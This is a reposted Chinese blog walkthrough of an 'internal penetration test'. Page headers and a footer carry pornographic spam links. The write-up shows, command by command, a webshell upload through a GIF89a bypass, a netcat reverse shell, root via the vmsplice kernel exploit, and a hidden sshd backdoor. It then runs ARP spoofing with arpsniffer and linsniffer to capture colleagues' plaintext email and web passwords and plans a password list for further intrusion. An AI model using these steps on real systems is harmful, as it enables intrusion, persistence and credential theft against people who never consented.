六月婷婷综合激情-六月婷婷综合-六月婷婷在线观看-六月婷婷在线-亚洲黄色在线网站-亚洲黄色在线观看网站

明輝手游網中心:是一個免費提供流行視頻軟件教程、在線學習分享的學習平臺!

一次Linux下ARP欺騙嗅探公司郵箱密碼的內部滲透測試

[摘要]早就跟相關人員說過郵箱認證smtp和pop協議要做加密, 否則在公司內網, 太容易被人sniffer到明文密碼了, 另外郵箱密碼和bbs公用, bbs也是采用的http協議, 沒有用https, 這...

早就跟相關人員說過郵箱認證smtp和pop協議要做加密, 否則在公司內網, 太容易被人sniffer到明文密碼了, 另外郵箱密碼和bbs公用, bbs也是采用的http協議, 沒有用https, 這些都是問題。 雖然我們控制的網絡部分已經做過處理了, ip和mac地址做了綁定, 即使有人做arp欺騙后, 除非不出網關, 否則欺騙后網絡到達不了網關之外, 因此嗅探明文郵箱密碼已經不可能(由于郵箱服務器不在同一網段)。 但是對于我們一些共用資源的服務器有公網ip和內網ip且處于一個相對風險較高, 而且沒有根據安全級別進行過相應的安全策略的網絡環境內, 因此一些問題是顯而易見的, 但是某些人根本不以為然。 所以我進行了一次簡單的內部滲透測試。

首先我從有公網ip和內網ip的網絡段入手, 如公網ip段是222.222.222.0/255.255.255.255, 內網ip段192.168.0.0/255.255.255.0。

經過踩點發現222.222.222.77(192.168.0.77)上跑了一個老版本的某php的論壇。 經過檢測, 存在上傳漏洞, 利用gif89a文件頭欺騙漏洞上傳webshell。 然后上傳個nst。

如圖1:

WindowsLiveWriter/LinuxARP_B4C8/1.jpg" target=_blank>一次Linux下ARP欺騙嗅探公司郵箱密碼的內部滲透測試 

利用tools里面的反彈連接:

首先在本地用nc -l -p 5546監聽端口

如圖4:

WindowsLiveWriter/LinuxARP_B4C8/4.jpg" target=_blank>一次Linux下ARP欺騙嗅探公司郵箱密碼的內部滲透測試

然后在nst上點Back connect

如圖2:(注意紅色部分)

WindowsLiveWriter/LinuxARP_B4C8/2.jpg" target=_blank>一次Linux下ARP欺騙嗅探公司郵箱密碼的內部滲透測試

成功登陸

如圖3:

WindowsLiveWriter/LinuxARP_B4C8/3.jpg" target=_blank>一次Linux下ARP欺騙嗅探公司郵箱密碼的內部滲透測試

圖5:

WindowsLiveWriter/LinuxARP_B4C8/5.jpg" target=_blank>一次Linux下ARP欺騙嗅探公司郵箱密碼的內部滲透測試

在本地nc的窗口操作:

id

uid=99(nobody) gid=99(nobody) groups=99(nobody)

權限低了點, 可以利用前一段時間linux內核vmsplice本地提升權限漏洞。 先用nst上傳代碼:

如圖6:(注意紅色部分, 上傳成功)

WindowsLiveWriter/LinuxARP_B4C8/6.jpg" target=_blank>一次Linux下ARP欺騙嗅探公司郵箱密碼的內部滲透測試

回到nc窗口:

cp in.c /tmp

cd /tmp

ls

in.c

nst_c_bc_c.c

sess_af927ee319af5d5569b61ac520e53fcf

ssh-ZeOfP16753

tunl0

gcc -o in in.c

ls

in

in.c

nst_c_bc_c.c

sess_af927ee319af5d5569b61ac520e53fcf

ssh-ZeOfP16753

tunl0

/tmp/in

bash: no job control in this shell

[root@bbs111 tmp]# id

uid=0(root) gid=0(root) groups=99(nobody)

[root@bbs111 tmp]#

已經是root權限了, 下一步上傳俺修改過的常用的后門, 這個以前寫過 一篇文章介紹如何留后門的, 這里就不敘述了(替換sshd和部分命令, 可隱藏端口、連接、文件、進程等)。

擦擦pp, 進行下一步我們的重點。

我們還是直接用后門sshd登錄。 還是ssh舒服點:)

如圖7:

WindowsLiveWriter/LinuxARP_B4C8/7.jpg" target=_blank>一次Linux下ARP欺騙嗅探公司郵箱密碼的內部滲透測試

在SecureCRT下利用rz命令上傳我們用到的arpsniffer.c, 然后編譯:

[root@bbs111 root]# gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

報錯, 可能是沒裝libnet的緣故, 看說明Make: first you must install "pcap" and "libnet" 確定arpsniffer.c需要先裝pcap和 libnet。

[root@bbs111 root]# rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm

[root@bbs111 root]# wget http://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz?modtime=1072656000&big_mirror=0

[root@bbs111 root]# tar zxvf libpcap-0.8.1.tar.gz

[root@bbs111 root]# cd libpcap-0.8.1

[root@bbs111 libpcap-0.8.1]# ./configure

[root@bbs111 libpcap-0.8.1]# make

[root@bbs111 libpcap-0.8.1]# make install

準備工作已經ok。 下面重新編譯arpsniffer.c

[root@bbs111 root]# gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet

這次沒報錯, 編譯成功。

[root@bbs111 root]# ./arpsniffer

====================================

============Arp Sniffer=============

==========Write by Paris-Ye=========

===Usage: ./arpsniffer -I [interface] -M [Self IP] -W [Workstation IP] -S [Server IP] -P [port]

===For example:

        ./arpsniffer -I eth0 -M 192.168.0.6 -W 192.168.0.4 -S 192.168.0.254

下面開始欺騙, 由于是服務器端, 因此我們欺騙網關:(網絡環境如下, 郵件服務器ip:192.168.0.11 網關:192.168.0.1 本機:192.168.0.77)

[root@bbs111 root]# ./arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110

110

110

Get network cards mac address:

M-> 00:0e:a6:a5:80:4f

W-> 00:0f:e2:23:05:d0

S-> 00:d0:b7:88:07:59

Now Start... .. .

在另一個登錄里面用tcpdump監聽下:

[root@bbs111 root]# tcpdump -i eth0 host 192.168.0.11

發現有數據, 把監聽的數據存在文件里面:

[root@bbs111 root]# tcpdump -i eth0 host 172.16.0.12 -w pop.txt

10分鐘后停止, 在SecureCRT下用sz命令下載pop.txt到本地, 然后用Ethereal分析。 果然發現明文用戶名和密碼。

下面我們就可以用linsniffer監聽我們想要的用戶名和密碼了。

先修改linsniffer.c:根據自己的需求監聽相應的應用密碼。 我的如下:

  if(ntohs(tcp->dest)==21)  p=1; /* ftp */

  if(ntohs(tcp->dest)==22)  p=1; /* ssh for comparison added for example only comment out if desired*/

  if(ntohs(tcp->dest)==23)  p=1; /* telnet */

  if(ntohs(tcp->dest)==80) p=1;  /* http */

  if(ntohs(tcp->dest)==110) p=1; /* pop3 */

  if(ntohs(tcp->dest)==513) p=1; /* rlogin */

  if(ntohs(tcp->dest)==106) p=1; /* poppasswd */

[root@bbs111 root]# gcc -o linsniffer linsniffer.c

In file included from /usr/include/linux/tcp.h:21,

                from linsniffer.c:32:

/usr/include/asm/byteorder.h:6:2: warning: #warning using private kernel header; include <endian.h> instead!

不用管警告, 直接運行編譯后的linsniffer即可。

[root@bbs111 root]# ./linsniffer

用戶名和密碼都自動存到了tcp.log下。 如圖8:

WindowsLiveWriter/LinuxARP_B4C8/8_1.jpg" target=_blank>一次Linux下ARP欺騙嗅探公司郵箱密碼的內部滲透測試

經過測試后, 我們把某人的用戶名和密碼發給某人, 相信他再不會想當然的說sniffer不可能了。 下面我們利用我們嗅探到的密碼做個密碼表, 進行新一輪進一步的內網滲透測試。 相信在我們根據滲透測試結果, 進行相關安全技術改造和安全管理規范制度改造后, 我們的網絡的安全性會大大提升。

文中所用工具下載:WindowsLiveWriter/LinuxARP_B4C8/tools.rar">ARP sniffer Tools.rar

 


上面是電腦上網安全的一些基礎常識,學習了安全知識,幾乎可以讓你免費電腦中毒的煩擾。




主站蜘蛛池模板: 日韩欧美一区二区三区不卡 | 日韩 欧美 中文 | 性生活一区 | 婷婷久久综合网 | 天天干天天干天天 | 欧美在线中文字幕高清的 | 在线天堂中文在线网 | 亚洲产国偷v产偷v自拍色戒 | 欧美性战| 亚洲图片 中文字幕 | 在线观看视频污 | 日韩a视频在线观看 | 偷拍第1页 | 亚洲青草视频 | 欧日韩在线不卡视频 | 色老头久久久久 | 五福影院在线观看 | 亚洲影视精品 | 日韩操穴 | 中日韩视频在线看免费观看 | 亚洲国产成人久久99精品 | 性xxxxx大片免费视频 | 一区二区网站在线观看 | 四虎在线最新永久免费播放 | 日韩免费视频一区 | 一区二区三区视频在线 | 全部毛片| 中文字幕亚洲综合久久男男 | 亚洲视频精品在线 | 日韩高清的天堂在线观看免费 | 全国男人的天堂网站 | 亚洲黄色一区二区 | 日本99视频 | 五月婷婷丁香久久 | 日本天堂网在线观看 | 青娱乐在线国产 | 天堂亚洲| 色老大综合久久综合热 | 天天夜夜人人 | 特黄特a级特别特级特毛片 特黄视频免费看 | 日韩a级一片在线观看 |